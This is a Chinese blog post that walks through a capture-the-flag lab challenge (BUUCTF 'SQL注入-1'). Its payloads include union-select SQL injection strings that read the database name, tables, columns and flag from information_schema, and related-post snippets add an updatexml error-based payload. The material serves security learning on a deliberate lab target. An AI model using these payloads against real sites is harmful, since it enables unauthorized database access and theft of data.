[第一章 web入门]SQL注入-1

最新推荐文章于 2025-02-10 21:17:24 发布
原创 最新推荐文章于 2025-02-10 21:17:24 发布 · 1.2k 阅读 · 3 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#经验分享
本文通过详细描述如何通过SQL注入技巧探测和利用一个应用的漏洞,展示了从识别注入点到获取敏感数据(如数据库名和表名)的过程,最终揭示了flag。

打开靶机

看见url里id=0

直接给他改成=1

那说明存在注入点

尝试id=2

尝试=3

按照提示来add

所以字段数为3,在3处可以显位

用联合查询

?id=-1' union select 1,database(),3 --+

得到数据库名为notes

再查表名

?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

预判在fl4g表里,打开该表

?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'--+

 然后爆数据得到flag

?id=-4' union select 1,database(), group_concat(fllllag) from fl4g --+

 over.

evil_ming
关注
BUUCTF [第一章 web入门]SQL注入-1
m0_49025459的博客
04-08 7068
题目 先找注入点,看一url 发现了 ?id=1测试一下是字符型注入还是数字型注入 分别对url进行如下修改,发现页面没有变化,证明不是字符型注入 id=1 and 1 = 1--+ id=1 and 1 = 2--+ 分别对url进行如下修改 id=1' and 1 = 1--+ id=1' and 1 = 2--+ 在更改url为第二个的时候,发现页面出现错误,证明存在字符型注入点 判断字符段的数量 id=1' order by 3 --+ id=1' order ...
buuctf-N1BOOK [第一章 web入门]SQL注入-1
最新发布
2301_81574836的博客
02-10 812
buuctf-N1BOOK [第一章 web入门]SQL注入-1题解
Web入门SQL注入(一)
qq_51459823的博客
11-12 822
昨天装好了工具,今天开始入门Web吧!就以Burpsuite官方靶场作为学习Web的起点 如下知识为刷Burpsite官方靶场所得,部分为自我思考,如有错误,希望各位提出: 首先我们先了解一下: 什么是 SQL 注入 (SQLi)? SQL 注入是一种 Web 安全漏洞,允许攻击者干扰应用程序对其数据库进行的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导致应用程序的内容或行为发生
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1679
简单的SQL注入
[第一章 web入门]SQL注入-1BUUCTF
observer的博客
03-14 1821
[第一章 web入门]SQL注入-1BUUCTF
《从0到1:CTFer成长之路》书籍配套题目-[第一章 web入门]SQL注入-1
weixin_46703850的博客
02-09 1179
《从0到1:CTFer成长之路》书籍配套题目,来源网站:[《从0到1:CTFer成长之路》](https://book.nu1l.com/)
[第一章 web入门]SQL注入-1,[第一章 web入门]SQL注入-2
m0_73721944的博客
11-14 221
得到payload:name=1'and updatexml(1,concat(0x7e,(sELECT group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+&pass=1' and 1=2 --+-- 如果觉得太难了,可以在url后加入?id=1 and 1=1--+ 正常。id=1' and 1=1--+ 正常。打开是这样的,很明显在url中存在注入点。
[第一章 web入门]SQL注入-1 题目分析与详解
2302_79800344的博客
02-25 2178
本题考查SQL注入基础。
webSQL注入
observer的博客
03-14 1539
[第一章 web入门]SQL注入-1BUUCTF
BUUCTF 第一章 web入门]SQL注入-1
2403_87464189的博客
02-01 538
id=1' 没有回显?id=1' --+ 成功回显 闭合方式为‘id=1' order by 3--+ 字段为三。id=1 and 1=2 成功回显 说明为字符型。首先通过url中的?id=1可中注入点是id。爆列 毫无疑问flag应该在fl4g中。这是一道基础的SQL注入题目。接下来判断是字符型还是数字型。这样flag就出来了。
BUUCTF-wp-[第一章 web入门]SQL注入-1
Accompany的博客
11-28 1733
文章目录开始进行注入get基于报错的注入,首先通过order by判断字段名利用union select 联合查询,查询字段确定好位置后,利用union select 联合查询,获取数据库名得到数据库名后进行爆表,得到表名得到表名后进行爆列爆列完成后查看记录 又是一个小小的分享,display() 进入页面后使用最经典的单引号判断法返回与id=1时不同的错误信息,便可以得知此题存在sql注入 然后通过如下操作可判断其是个字符型注入 此处的判断对于此题有点冗余,两种注入的差别并不大 id=1%27%20a
[第一章 web入门]SQL注入 三种解法
u011250160的博客
12-15 1373
解法一:联合查询 看到这个id=1莫名的就想试试id=2,3,4 index.php?id=1 index.php?id=2 index.php?id=3 id=4的时候就没了 index.php?id=4 查看下tips 如果有能力的话还是自己猜后台的语句 index.php?id=1&tips=1 判断字段个数 当order by 1,2,3没错 当order by 1,2,3,4没显示了 说明这里就是三个字段 然后寻找回显的位置 之前的文章里我也提到过,联合查询会先显示前面
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值